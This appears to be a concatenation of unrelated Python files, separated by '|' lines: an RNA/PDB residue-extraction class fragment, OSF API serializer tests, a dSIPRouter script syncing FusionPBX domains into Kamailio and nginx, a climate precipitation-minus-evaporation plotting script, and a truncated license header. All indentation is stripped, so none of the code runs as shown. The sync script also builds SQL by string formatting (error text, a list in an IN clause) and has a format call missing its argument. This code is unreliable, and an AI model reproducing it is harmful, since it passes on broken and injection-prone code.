if len(c1p_coord)==0:
c1p_coord.append(array([0,0,0],'f'))
self.p_tree = KDTree(p_coord)
self.o3p_tree = KDTree(o3p_coord)
self.c1p_coord = c1p_coord
self.c1p_tree = KDTree(c1p_coord)
def get_resname(self, num):
if num not in self.res_dict:
return '?'
return self.res_dict[num].get_resname().strip()
def get_res_atoms_dict(self, num):
if num not in self.res_dict:
return None
res = {}
for a in self.res_dict[num]:
res[a.id] = a.get_coord().tolist()
# add O3' from next nucleotide
o3p_residue = self._locate_backbone(self.res_dict[num], 'P')
if o3p_residue is not None:
for a in o3p_residue:
res["NEXT:%s"%a.id]=a.get_coord().tolist()
return res
def _locate_atom(self, r, id):
for a in r:
if a.id==id:
return a
return None
def _locate_backbone(self, r, atom):
# TODO: use all residues for locating other atoms!
a = self._locate_atom(r,atom)
if a is None:
return None
point = a.get_coord()
res_key = None
if atom=='P':
(d,p) = self.o3p_tree.query(point, k=1)
else:
(d,p) = self.p_tree.query(point, k=1)
if d<1.4 or d>1.7:
return None
res_key = self.good_residues[p]
rr = self.res_dict[res_key]
if r.id==rr.id:
return None
result = PDB.Residue.Residue(rr.id, rr.resname, rr.segid)
if atom == 'P':
other_atoms = ["O3'"]
else:
other_atoms = ["P","OP1","O5'","OP2"]
for a in rr:
if a.id in other_atoms:
result.add(a)
return result
def initalize_get_neighbours_other():
self.all_atoms_coords = []
self.all_atoms_res = []
for (key,r) in list(self.res_dict.items()):
for a in r:
self.all_atoms_coords.append(a.get_coord())
self.all_atoms_res.append(key)
self.all_atoms_tree = KDTree(self.all_atoms_coords)
def residue_distance(self, num1, num2, max_distance=100):
d = 1000
if num1 not in self.res_dict or num2 not in self.res_dict:
return d
for a1 in self.res_dict[num1]:
p1 = a1.get_coord()
for a2 in self.res_dict[num2]:
p2 = a2.get_coord()
d = min(d, dist(p1,p2))
if d<max_distance:
return d
return d
def get_neighbours(self, num, max_distance=4.0):
if num not in self.good_residues_num:
return []
i = self.good_residues_num[num]
res = []
points = self.c1p_tree.query_ball_point(self.c1p_coord[i], r=max_distance+15.0)
for j in points:
if i==j or j>=len(self.good_residues):
continue
num2 = self.good_residues[j]
if self.residue_distance(num,num2,max_distance)<=max_distance:
res.append(num2)
return res
def get_neighbours_other(self, num, max_distance=4.0):
if num not in self.res_dict:
return []
res = set()
for a in self.res_dict[num]:
if not (a.id in ['P',"C1'","C6"]):
continue
points = self.all_atoms_tree.query_ball_point(a.get_coord(), r=max_distance)
for j in set(points):
if j>=len(self.all_atoms_coords):
continue
num2 = self.all_atoms_res[j]
if num2!=num:
res.add(num2)
return list(res)
def get_single_residue(self, num, with_backbone=False):
if num not in self.res_dict:
return None
r1 = self.res_dict[num]
structure = PDB.Structure.Structure("extracted")
model = PDB.Model.Model(1)
structure.add(model)
c1 = PDB.Chain.Chain("A")
if with_backbone:
r = self._locate_backbone(r1,'P')
if r is not None:
c1.add(r)
c1.add(r1)
if with_backbone:
r = self._locate_backbone(r1,"O3'")
if r is not None:
c1.add(r)
model.add(c1)
return structure
def extract(self,fn, num1, num2, desc, n_type, prg, with_backbone=False):
if num1 not in self.res_dict:
return False
r1 = self.res_dict[num1]
if num2 not in self.res_dict:
return False
r2 = self.res_dict[num2]
if fn=="dict-no-pdb":
return {
'resseq_1': num1[1:],
'resseq_2': num2[1:],
'chain_1': num1[0],
'chain_2': num2[0],
'desc': desc,
'n_type': n_type,
'prg': prg,
}
structure = PDB.Structure.Structure("extracted")
model = PDB.Model.Model(1)
structure.add(model)
c1_id = "A"
c1 = PDB.Chain.Chain(c1_id)
if with_backbone:
r = self._locate_backbone(r1,'P')
if r is not None:
c1.add(r)
c1.add(r1)
if with_backbone:
r = self._locate_backbone(r1,"O3'")
if r is not None:
c1.add(r)
c2_id = "B"
c2 = PDB.Chain.Chain(c2_id)
if with_backbone:
r = self._locate_backbone(r2,'P')
if r is not None:
c2.add(r)
c2.add(r2)
if with_backbone:
r = self._locate_backbone(r2,"O3'")
if r is not None:
c2.add(r)
model.add(c1)
model.add(c2)
if fn=="dict":
output = StringIO.StringIO()
io = PDB.PDBIO()
io.set_structure(structure)
io.save(output)
return {
'resseq_1': num1[1:],
'resseq_2': num2[1:],
'chain_1': num1[0],
'chain_2': num2[0],
'pdb': output.getvalue(),
'desc': desc,
'n_type': n_type,
'prg': prg,
}
else:
io = PDB.PDBIO()
io.set_structure(structure)
io.save(fn)
return True
|
|
# -*- coding: utf-8 -*-
import httplib as http
import contextlib
import mock
from nose.tools import * # flake8: noqa
from tests.base import ApiTestCase, DbTestCase
from tests import factories
from tests.utils import make_drf_request
from api.base.settings.defaults import API_BASE
from api.base.serializers import JSONAPISerializer
from api.base import serializers as base_serializers
from api.nodes.serializers import NodeSerializer, RelationshipField
class FakeModel(object):
def null_field(self):
return None
def valued_field(self):
return 'Some'
null = None
foo = 'bar'
pk = '1234'
class FakeSerializer(base_serializers.JSONAPISerializer):
class Meta:
type_ = 'foos'
links = base_serializers.LinksField({
'null_field': 'null_field',
'valued_field': 'valued_field',
})
null_link_field = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<null>'},
)
valued_link_field = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<foo>'},
)
def null_field(*args, **kwargs):
return None
def valued_field(*args, **kwargs):
return 'http://foo.com'
class TestNullLinks(ApiTestCase):
def test_null_links_are_omitted(self):
req = make_drf_request()
rep = FakeSerializer(FakeModel, context={'request': req}).data['data']
assert_not_in('null_field', rep['links'])
assert_in('valued_field', rep['links'])
assert_not_in('null_link_field', rep['relationships'])
assert_in('valued_link_field', rep['relationships'])
class TestApiBaseSerializers(ApiTestCase):
def setUp(self):
super(TestApiBaseSerializers, self).setUp()
self.node = factories.ProjectFactory(is_public=True)
for i in range(5):
factories.ProjectFactory(is_public=True, parent=self.node)
self.url = '/{}nodes/{}/'.format(API_BASE, self.node._id)
def test_counts_not_included_in_link_fields_by_default(self):
res = self.app.get(self.url)
relationships = res.json['data']['relationships']
for relation in relationships.values():
if relation == {}:
continue
link = relation['links'].values()[0]
assert_not_in('count', link['meta'])
def test_counts_included_in_link_fields_with_related_counts_query_param(self):
res = self.app.get(self.url, params={'related_counts': True})
relationships = res.json['data']['relationships']
for key, relation in relationships.iteritems():
if relation == {}:
continue
field = NodeSerializer._declared_fields[key]
if (field.related_meta or {}).get('count'):
link = relation['links'].values()[0]
assert_in('count', link['meta'])
def test_related_counts_excluded_query_param_false(self):
res = self.app.get(self.url, params={'related_counts': False})
relationships = res.json['data']['relationships']
for relation in relationships.values():
if relation == {}:
continue
link = relation['links'].values()[0]
assert_not_in('count', link['meta'])
def test_invalid_related_counts_value_raises_bad_request(self):
res = self.app.get(self.url, params={'related_counts': 'fish'}, expect_errors=True)
assert_equal(res.status_code, http.BAD_REQUEST)
def test_invalid_embed_value_raise_bad_request(self):
res = self.app.get(self.url, params={'embed': 'foo'}, expect_errors=True)
assert_equal(res.status_code, http.BAD_REQUEST)
assert_equal(res.json['errors'][0]['detail'], "The following fields are not embeddable: foo")
class TestRelationshipField(DbTestCase):
# We need a Serializer to test the Relationship field (needs context)
class BasicNodeSerializer(JSONAPISerializer):
parent = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<pk>'}
)
parent_with_meta = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_count', 'extra': 'get_extra'},
)
self_and_related_field = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<pk>'},
self_view='nodes:node-contributors',
self_view_kwargs={'node_id': '<pk>'},
)
two_url_kwargs = RelationshipField(
# fake url, for testing purposes
related_view='nodes:node-pointer-detail',
related_view_kwargs={'node_id': '<pk>', 'node_link_id': '<pk>'},
)
not_attribute_on_target = RelationshipField(
# fake url, for testing purposes
related_view='nodes:node-children',
related_view_kwargs={'node_id': '12345'}
)
class Meta:
type_ = 'nodes'
def get_count(self, obj):
return 1
def get_extra(self, obj):
return 'foo'
# TODO: Expand tests
# Regression test for https://openscience.atlassian.net/browse/OSF-4832
def test_serializing_meta(self):
req = make_drf_request()
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(node, context={'request': req}).data['data']
meta = data['relationships']['parent_with_meta']['links']['related']['meta']
assert_not_in('count', meta)
assert_in('extra', meta)
assert_equal(meta['extra'], 'foo')
def test_self_and_related_fields(self):
req = make_drf_request()
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(node, context={'request': req}).data['data']
relationship_field = data['relationships']['self_and_related_field']['links']
assert_in('/v2/nodes/{}/contributors/'.format(node._id), relationship_field['self']['href'])
assert_in('/v2/nodes/{}/'.format(node._id), relationship_field['related']['href'])
def test_field_with_two_kwargs(self):
req = make_drf_request()
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(node, context={'request': req}).data['data']
field = data['relationships']['two_url_kwargs']['links']
assert_in('/v2/nodes/{}/node_links/{}/'.format(node._id, node._id), field['related']['href'])
def test_field_with_non_attribute(self):
req = make_drf_request()
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(node, context={'request': req}).data['data']
field = data['relationships']['not_attribute_on_target']['links']
assert_in('/v2/nodes/{}/children/'.format('12345'), field['related']['href'])
|
|
import os, psycopg2, hashlib, MySQLdb, subprocess, docker
from database import dSIPMultiDomainMapping
from util.security import AES_CTR
from shared import safeUriToHost
# TODO: error handling here is pretty bad, we need to establish connection from main func and pass conn/cursors to sub funcs
# I implemented an exmaple in sync_needed() of proper connection / cursor handling, we need to move that to the entry func
# i.e. run_sync() should utilize the proper handling of the connections/cursors and pass them to sub functions
# Obtain a set of FusionPBX systems that contains domains that Kamailio will route traffic to.
def get_sources(db):
# Dictionary object to hold the set of source FusionPBX systems
sources = {}
# Kamailio Database Parameters
kam_hostname = db['hostname']
kam_username = db['username']
kam_password = db['password']
kam_database = db['database']
try:
db = MySQLdb.connect(host=kam_hostname, user=kam_username, passwd=kam_password, db=kam_database)
c = db.cursor()
c.execute(
"""select pbx_id,address as pbx_host,db_host,db_username,db_password,domain_list,domain_list_hash,attr_list,dsip_multidomain_mapping.type from dsip_multidomain_mapping join dr_gw_lists on dsip_multidomain_mapping.pbx_id=dr_gw_lists.id join dr_gateways on dr_gateways.gwid = dr_gw_lists.gwlist where enabled=1""")
results = c.fetchall()
db.close()
for row in results:
# Store the PBX_ID as the key and the entire row as the value
sources[row[1]] = row
except Exception as e:
print(str(e))
return sources
# Will remove all of the fusionpbx domain data so that it can be rebuilt
def drop_fusionpbx_domains(source, dest):
# PBX Domain Mapping Parameters
pbx_domain_list = source[5]
pbx_attr_list = source[6]
# Kamailio Database Parameters
kam_hostname = dest['hostname']
kam_username = dest['username']
kam_password = dest['password']
kam_database = dest['database']
pbx_domain_list = list(map(int, filter(None, pbx_domain_list.split(","))))
pbx_attr_list = list(map(int, filter(None, pbx_attr_list.split(","))))
kam_conn = None
kam_curs = None
try:
kam_conn = MySQLdb.connect(host=kam_hostname, user=kam_username, passwd=kam_password, db=kam_database)
kam_curs = kam_conn.cursor()
if len(pbx_domain_list) > 0:
kam_curs.execute("""DELETE FROM domain WHERE id IN({})""".format(pbx_domain_list))
if len(pbx_attr_list) > 0:
kam_curs.execute("""DELETE FROM domain_attrs WHERE id IN({})""".format(pbx_attr_list))
kam_conn.commit()
except Exception as ex:
error = str(ex)
try:
kam_conn.rollback()
kam_curs.execute("update dsip_multidomain_mapping set syncstatus=4, lastsync=NOW(),syncerror='{}'".format(error))
kam_conn.commit()
except:
pass
raise ex
finally:
if kam_curs is not None:
kam_curs.close()
if kam_conn is not None:
kam_conn.close()
def sync_db(source, dest):
# FusionPBX Database Parameters
pbx_id = source[0]
pbx_host = source[1]
if ':' in source[2]:
fpbx_hostname = source[2].split(':')[0]
fpbx_port = source[2].split(':')[1]
else:
fpbx_hostname = source[2]
fpbx_port = 5432
fpbx_username = source[3]
fpbx_password = source[4]
pbx_domain_list = source[5]
pbx_attr_list = source[6]
pbx_type = source[8]
fpbx_database = 'fusionpbx'
# Kamailio Database Parameters
kam_hostname = dest['hostname']
kam_username = dest['username']
kam_password = dest['password']
kam_database = dest['database']
domain_id_list = []
attr_id_list = []
fpbx_conn = None
fpbx_curs = None
kam_conn = None
kam_curs = None
try:
# Get a connection to Kamailio Server DB
kam_conn = MySQLdb.connect(host=kam_hostname, user=kam_username, passwd=kam_password, db=kam_database)
kam_curs = kam_conn.cursor()
# Delete existing domain for the pbx
pbx_domain_list_str = ''.join(str(e) for e in pbx_domain_list)
if len(pbx_domain_list_str) > 0:
query = "delete from domain where id in ({})".format(pbx_domain_list_str)
kam_curs.execute(query)
pbx_domain_list = ''
# Trying connecting to PostgresSQL database using a Trust releationship first
fpbx_conn = psycopg2.connect(dbname=fpbx_database, user=fpbx_username, host=fpbx_hostname, port=fpbx_port, password=fpbx_password)
if fpbx_conn is not None:
print("Connection to FusionPBX:{} database was successful".format(fpbx_hostname))
fpbx_curs = fpbx_conn.cursor()
fpbx_curs.execute("""select domain_name from v_domains where domain_enabled='true'""")
rows = fpbx_curs.fetchall()
if rows is not None:
counter = 0
domain_name_str = ""
for row in rows:
kam_curs.execute("""insert ignore into domain (id,domain,did,last_modified) values (null,%s,%s,NOW())""",
(row[0], row[0]))
if kam_curs.rowcount > 0:
kam_curs.execute(
"""SELECT AUTO_INCREMENT FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME IN('domain') ORDER BY FIND_IN_SET(TABLE_NAME, 'domain')""")
rows_left = kam_curs.fetchall()
domain_id_list.append(str(rows_left[0][0] - 1))
# Delete all domain_attrs for the domain first
kam_curs.execute("""delete from domain_attrs where did=%s""", [row[0]])
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'pbx_ip',2,%s,NOW())""",
(row[0], pbx_host))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'pbx_type',2,%s,NOW())""",
(row[0], pbx_type))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'created_by',2,%s,NOW())""",
(row[0], pbx_id))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'dispatcher_set_id',2,%s,NOW())""",
(row[0], pbx_id))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'dispatcher_reg_alg',2,%s,NOW())""",
(row[0], 4))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'domain_auth',2,%s,NOW())""",
(row[0], 'passthru'))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'pbx_list',2,%s,NOW())""",
(row[0], pbx_id))
kam_curs.execute(
"""insert ignore into domain_attrs (id,did,name,type,value,last_modified) values (null,%s,'description',2,%s,NOW())""",
(row[0], 'notes:'))
counter = counter + 1
domain_name_str += row[0]
# Convert to a string seperated by commas
domain_id_list = ','.join(domain_id_list)
if not pbx_domain_list: # if empty string then this is the first set of domains
pbx_domain_list = domain_id_list
else: # adding to an existing list of domains
pbx_domain_list = pbx_domain_list + "," + domain_id_list
print("[sync_db] String of domains: {}".format(domain_name_str))
# Create Hash of the string
domain_name_str_hash = hashlib.md5(domain_name_str.encode('utf-8')).hexdigest()
print("[sync_db] Hashed String of domains: {}".format(domain_name_str_hash))
kam_curs.execute(
"""update dsip_multidomain_mapping set domain_list=%s, domain_list_hash=%s,syncstatus=1, lastsync=NOW(),syncerror='' where pbx_id=%s""",
(pbx_domain_list, domain_name_str_hash, pbx_id))
kam_conn.commit()
except Exception as ex:
error = str(ex)
try:
kam_conn.rollback()
kam_curs.execute("update dsip_multidomain_mapping set syncstatus=4, lastsync=NOW(),syncerror='{}'".format(error))
kam_conn.commit()
except:
pass
raise ex
finally:
if fpbx_conn is not None:
fpbx_conn.close()
if fpbx_curs is not None:
fpbx_curs.close()
if kam_curs is not None:
kam_curs.close()
if kam_conn is not None:
kam_conn.close()
def reloadkam(kamcmd_path):
try:
# subprocess.call(['kamcmd' ,'permissions.addressReload'])
# subprocess.call(['kamcmd','drouting.reload'])
subprocess.call([kamcmd_path, 'domain.reload'])
return True
except:
return False
def update_nginx(sources):
print("Updating Nginx")
# Connect to docker
client = docker.from_env()
if client is not None:
print("Got handle to docker")
try:
# If there isn't any FusionPBX sources then just shutdown the container
if len(sources) < 1:
containers = client.containers.list()
for container in containers:
if container.name == "dsiprouter-nginx":
# Stop the container
container.stop()
container.remove(force=True)
print("Stopped nginx container")
return
except Exception as e:
os.remove("./.sync-lock")
print(e)
# Create the Nginx file
serverList = ""
for source in sources:
serverList += "server " + safeUriToHost(str(source)) + ":443;\n"
# print(serverList)
script_dir = os.path.dirname(os.path.abspath(__file__))
# print(script_dir)
input = open(script_dir + "/dsiprouter.nginx.tpl")
output = open(script_dir + "/dsiprouter.nginx", "w")
output.write(input.read().replace("##SERVERLIST##", serverList))
output.close()
input.close()
# Check if dsiprouter-nginx is running. If so, reload nginx
containers = client.containers.list()
print("past container list")
for container in containers:
if container.name == "dsiprouter-nginx":
# Execute a command to reload nginx
container.exec_run("nginx -s reload")
print("Reloaded nginx")
return
# Start the container if one is not running
try:
print("trying to create a container")
host_volume_path = script_dir + "/dsiprouter.nginx"
html_volume_path = script_dir + "/html"
cert_volume_path = script_dir + "/certs"
# host_volume_path = script_dir
print(host_volume_path)
# remove the container with a name of dsiprouter-nginx to avoid conflicts if it already exists
containerList = client.containers.list('dsiprouter-nginx')
containerFound = False
for c in containerList:
if c.name == "dsiprouter-nginx":
containerFound = True
if containerFound:
print("dsiprouter-nginx found...about to remove it and recreate")
container = client.containers.get('dsiprouter-nginx')
container.remove()
client.containers.run(image='nginx:latest',
name="dsiprouter-nginx",
ports={'80/tcp': '80/tcp', '443/tcp': '443/tcp'},
volumes={
host_volume_path: {'bind': '/etc/nginx/conf.d/default.conf', 'mode': 'rw'},
html_volume_path: {'bind': '/etc/nginx/html', 'mode': 'rw'},
cert_volume_path: {'bind': '/etc/ssl/certs', 'mode': 'rw'}
},
detach=True)
print("created a container")
except Exception as e:
os.remove("./.sync-lock")
print(str(e))
def sync_needed(source, dest):
# FusionPBX Database Parameters
pbx_id = source[0]
pbx_host = source[1]
if ':' in source[2]:
fpbx_hostname = source[2].split(':')[0]
fpbx_port = source[2].split(':')[1]
else:
fpbx_hostname = source[2]
fpbx_port = 5432
fpbx_username = source[3]
fpbx_password = source[4]
pbx_domain_list = source[5]
pbx_domain_list_hash = source[6]
pbx_attr_list = source[7]
pbx_type = source[8]
fpbx_database = 'fusionpbx'
# Kamailio Database Parameters
kam_hostname = dest['hostname']
kam_username = dest['username']
kam_password = dest['password']
kam_database = dest['database']
domain_id_list = []
attr_id_list = []
need_sync = True
fpbx_conn = None
fpbx_curs = None
kam_conn = None
kam_curs = None
# Trying connecting to the databases
try:
# Get a connection to Kamailio Server DB
kam_conn = MySQLdb.connect(host=kam_hostname, user=kam_username, passwd=kam_password, db=kam_database)
kam_curs = kam_conn.cursor()
if kam_curs is not None:
print("[sync_needed] Connection to Kamailio DB:{} database was successful".format(kam_hostname))
# Get a connection to the FusionPBX Server
fpbx_conn = psycopg2.connect(dbname=fpbx_database, user=fpbx_username, host=fpbx_hostname, port=fpbx_port, password=fpbx_password)
if fpbx_conn is not None:
print("[sync_needed] Connection to FusionPBX:{} database was successful".format(fpbx_hostname))
fpbx_curs = fpbx_conn.cursor()
fpbx_curs.execute("""select domain_name from v_domains where domain_enabled='true'""")
rows = fpbx_curs.fetchall()
if rows is not None:
domain_name_str = ""
# Build a string that contains all of the domains
for row in rows:
domain_name_str += row[0]
print("[sync_needed] String of domains: {}".format(domain_name_str))
# Create Hash of the string
domain_name_str_hash = hashlib.md5(domain_name_str.encode('utf-8')).hexdigest()
print("[sync_needed] Hashed String of domains: {}".format(domain_name_str_hash))
if domain_name_str_hash == pbx_domain_list_hash:
# Sync not needed. Will update the syncstatus=2 to denote a domain change was not detected
kam_curs.execute("""update dsip_multidomain_mapping set syncstatus=2, lastsync=NOW()""")
kam_conn.commit()
need_sync = False
else:
# No domains yet, so no need to sync
kam_curs.execute("""update dsip_multidomain_mapping set syncstatus=3, lastsync=NOW()""")
kam_conn.commit()
need_sync = False
return need_sync
except Exception as e:
error = str(e)
print(error)
try:
kam_conn.rollback()
kam_curs.execute("update dsip_multidomain_mapping set syncstatus=4, lastsync=NOW(),syncerror='{}'".format())
kam_conn.commit()
except:
pass
finally:
if fpbx_conn is not None:
fpbx_conn.close()
if fpbx_curs is not None:
fpbx_curs.close()
if kam_curs is not None:
kam_curs.close()
if kam_conn is not None:
kam_conn.close()
def run_sync(settings):
try:
# Set the system where sync'd data will be stored.
# The Kamailio DB in our case
# If already running - don't run
if os.path.isfile("./.sync-lock"):
print("Already running")
return
else:
f = open("./.sync-lock", "w+")
f.close()
# need to decrypt password if encrypted
if isinstance(settings.KAM_DB_PASS, bytes):
kam_password = AES_CTR.decrypt(settings.KAM_DB_PASS).decode('utf-8')
else:
kam_password = settings.KAM_DB_PASS
dest = {}
dest['hostname'] = settings.KAM_DB_HOST
dest['username'] = settings.KAM_DB_USER
dest['password'] = kam_password
dest['database'] = settings.KAM_DB_NAME
# Get the list of FusionPBX's that needs to be sync'd
sources = get_sources(dest)
# Loop thru each FusionPBX system and start the sync
for key in sources:
if sync_needed(sources[key], dest):
#drop_fusionpbx_domains(sources[key], dest)
sync_db(sources[key], dest)
else:
print("[run_sync] No sync needed for source: {}".format(sources[key][1]))
# Reload Kamailio
reloadkam(settings.KAM_KAMCMD_PATH)
# Update Nginx configuration file for HTTP Provisioning and start docker container if we have FusionPBX systems
# update_nginx(sources[key])
if sources is not None and len(sources) > 0:
sources = list(sources.keys())
update_nginx(sources)
except Exception as e:
print(str(e))
finally:
# Remove lock file
os.remove("./.sync-lock")
|
|
"""Plot spatial P-E"""
import re
import sys
script_dir = sys.path[0]
import os
import pdb
import argparse
import numpy as np
import matplotlib.pyplot as plt
import iris
from iris.experimental.equalise_cubes import equalise_attributes
import cartopy.crs as ccrs
import cmdline_provenance as cmdprov
repo_dir = '/'.join(script_dir.split('/')[:-2])
module_dir = repo_dir + '/modules'
sys.path.append(module_dir)
try:
import general_io as gio
import timeseries
except ImportError:
raise ImportError('Script and modules in wrong directories')
def regrid(cube):
"""Define the sample points for interpolation"""
lats = list(np.arange(-89, 90, 2))
lons = list(np.arange(1, 360, 2))
sample_points = []
coord_names = [coord.name() for coord in cube.dim_coords]
if 'time' in coord_names:
coord_names.remove('time')
for coord in coord_names:
if 'lat' in coord:
sample_points.append((coord, lats))
elif 'lon' in coord:
sample_points.append((coord, lons))
cube = cube.interpolate(sample_points, iris.analysis.Linear())
cube.coord('latitude').guess_bounds()
cube.coord('longitude').guess_bounds()
cube.coord('latitude').standard_name = 'latitude'
cube.coord('latitude').long_name = 'latitude'
cube.coord('latitude').var_name = 'lat'
cube.coord('latitude').units = 'degrees_north'
cube.coord('latitude').attributes = {}
cube.coord('longitude').standard_name = 'longitude'
cube.coord('longitude').long_name = 'longitude'
cube.coord('longitude').var_name = 'lon'
cube.coord('longitude').units = 'degrees_east'
cube.coord('longitude').circular = True
cube.coord('longitude').attributes = {}
return cube
def get_cube_list(infiles, agg, time_bounds=None, quick=False):
"""Read and process data."""
assert agg in ['clim', 'anom']
ensemble_cube_list = iris.cube.CubeList([])
for ensnum, ensemble_member in enumerate(infiles):
print(ensemble_member)
cube, history = gio.combine_files(ensemble_member,
'precipitation_minus_evaporation_flux',
new_calendar='365_day')
cube = gio.check_time_units(cube)
if time_bounds:
time_constraint = gio.get_time_constraint(time_bounds)
cube = cube.extract(time_constraint)
elif quick:
cube = cube[0:120, ::]
if agg == 'clim':
cube = timeseries.convert_to_annual(cube, aggregation='mean', days_in_month=True)
cube = cube.collapsed('time', iris.analysis.MEAN)
elif agg == 'anom':
start_data = cube.data[0, ::]
cube = cube[-1, ::]
cube.data = cube.data - start_data
cube.remove_coord('time')
cube = regrid(cube)
new_aux_coord = iris.coords.AuxCoord(ensnum, long_name='ensemble_member', units='no_unit')
cube.add_aux_coord(new_aux_coord)
cube.cell_methods = ()
ensemble_cube_list.append(cube)
print("Total number of models:", len(ensemble_cube_list))
return ensemble_cube_list, history
def ensemble_stats(cube_list):
"""Get the ensemble mean and sign agreement"""
equalise_attributes(cube_list)
ensemble_cube = cube_list.merge_cube()
ensemble_mean = ensemble_cube.collapsed('ensemble_member', iris.analysis.MEAN, mdtol=0)
ensemble_mean.remove_coord('ensemble_member')
ensemble_agreement = ensemble_mean.copy()
nmodels = ensemble_cube.shape[0]
pos_data = ensemble_cube.data > 0.0
ensemble_agreement.data = pos_data.sum(axis=0) / nmodels
return ensemble_mean, ensemble_agreement
def plot_data(ax, ensemble_mean, ensemble_agreement, agg, title,
agreement_bounds=None, clim=None):
"""Plot ensemble data"""
assert agg in ['clim', 'anom']
inproj = ccrs.PlateCarree()
plt.sca(ax)
plt.gca().set_global()
if agg == 'clim':
cmap = 'BrBG'
levels = np.arange(-7, 8, 1)
cbar_label = 'Annual mean P-E (mm/day)'
else:
cmap = 'RdBu'
levels = np.arange(-9000, 9100, 1500)
cbar_label = 'Time-integrated P-E anomaly, 1861-2005 (kg m-2)'
x = ensemble_mean.coord('longitude').points
y = ensemble_mean.coord('latitude').points
cf = ax.contourf(x, y, ensemble_mean.data,
transform=inproj,
cmap=cmap,
levels=levels,
extend='both')
if agreement_bounds:
hatch_data = ensemble_agreement.data
ax.contourf(x, y, hatch_data,
transform=inproj,
colors='none',
levels=agreement_bounds,
hatches=['\\\\'],) # # '.', '/', '\\', '\\\\', '*'
if clim:
ce = ax.contour(x, y, clim.data,
transform=inproj,
colors=['goldenrod', 'black', 'green'],
levels=np.array([-2, 0, 2]))
cbar = plt.colorbar(cf)
cbar.set_label(cbar_label) #, fontsize=label_size)
# cbar.ax.tick_params(labelsize=number_size)
plt.gca().coastlines()
ax.set_title(title)
if agg == 'clim':
lons = np.arange(-180, 180, 0.5)
lats_sh = np.repeat(-20, len(lons))
lats_nh = np.repeat(20, len(lons))
plt.plot(lons, lats_sh, color='0.5') # linestyle, linewidth
plt.plot(lons, lats_nh, color='0.5')
def main(args):
"""Run the program."""
clim_cube_list, clim_history = get_cube_list(args.clim_files, 'clim', quick=args.quick)
clim_ensemble_mean, clim_ensemble_agreement = ensemble_stats(clim_cube_list)
clim_ensemble_mean.data = clim_ensemble_mean.data * 86400
ghg_cube_list, ghg_history = get_cube_list(args.ghg_files, 'anom', time_bounds=args.time_bounds)
ghg_ensemble_mean, ghg_ensemble_agreement = ensemble_stats(ghg_cube_list)
aa_cube_list, aa_history = get_cube_list(args.aa_files, 'anom', time_bounds=args.time_bounds)
aa_ensemble_mean, aa_ensemble_agreement = ensemble_stats(aa_cube_list)
hist_cube_list, hist_history = get_cube_list(args.hist_files, 'anom', time_bounds=args.time_bounds)
hist_ensemble_mean, hist_ensemble_agreement = ensemble_stats(hist_cube_list)
width = 25
height = 10
fig = plt.figure(figsize=[width, height])
outproj = ccrs.PlateCarree(central_longitude=180.0)
nrows = 2
ncols = 2
ax1 = plt.subplot(nrows, ncols, 1, projection=outproj)
plot_data(ax1,
clim_ensemble_mean,
clim_ensemble_agreement,
'clim',
'(a) piControl',
agreement_bounds=[0.33, 0.66])
ax2 = plt.subplot(nrows, ncols, 2, projection=outproj)
plot_data(ax2,
ghg_ensemble_mean,
ghg_ensemble_agreement,
'anom',
'(b) GHG-only',
agreement_bounds=[0.33, 0.66],
clim=clim_ensemble_mean)
ax3 = plt.subplot(nrows, ncols, 3, projection=outproj)
plot_data(ax3,
aa_ensemble_mean,
aa_ensemble_agreement,
'anom',
'(c) AA-only',
agreement_bounds=[0.33, 0.66],
clim=clim_ensemble_mean)
ax4 = plt.subplot(nrows, ncols, 4, projection=outproj)
plot_data(ax4,
hist_ensemble_mean,
hist_ensemble_agreement,
'anom',
'(d) historical',
agreement_bounds=[0.33, 0.66],
clim=clim_ensemble_mean)
fig.tight_layout()
fig.subplots_adjust(wspace=-0.15, hspace=0.2)
plt.savefig(args.outfile, bbox_inches='tight', dpi=300)
metadata_dict = {args.ghg_files[-1]: ghg_history[-1],
args.clim_files[-1]: clim_history[-1]}
log_text = cmdprov.new_log(infile_history=metadata_dict, git_repo=repo_dir)
log_file = re.sub('.png', '.met', args.outfile)
cmdprov.write_log(log_file, log_text)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__,
argument_default=argparse.SUPPRESS,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("outfile", type=str, help="output file")
parser.add_argument("--clim_files", type=str, nargs='*', help="climatology files")
parser.add_argument("--ghg_files", type=str, nargs='*', help="time-integrated anomaly files for GHG-only experiment")
parser.add_argument("--aa_files", type=str, nargs='*', help="time-integrated anomaly files for AA-only experiment")
parser.add_argument("--hist_files", type=str, nargs='*', help="time-integrated anomaly files for historical experiment")
parser.add_argument("--time_bounds", type=str, nargs=2, metavar=('START_DATE', 'END_DATE'),
default=['1861-01-01', '2005-12-31'],
help="Time period")
parser.add_argument("--quick", action="store_true", default=False,
help="Use only first 10 years of clim files")
args = parser.parse_args()
main(args)
|
|
# Copyright (c) 2015 Hewlett-Packard Co.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
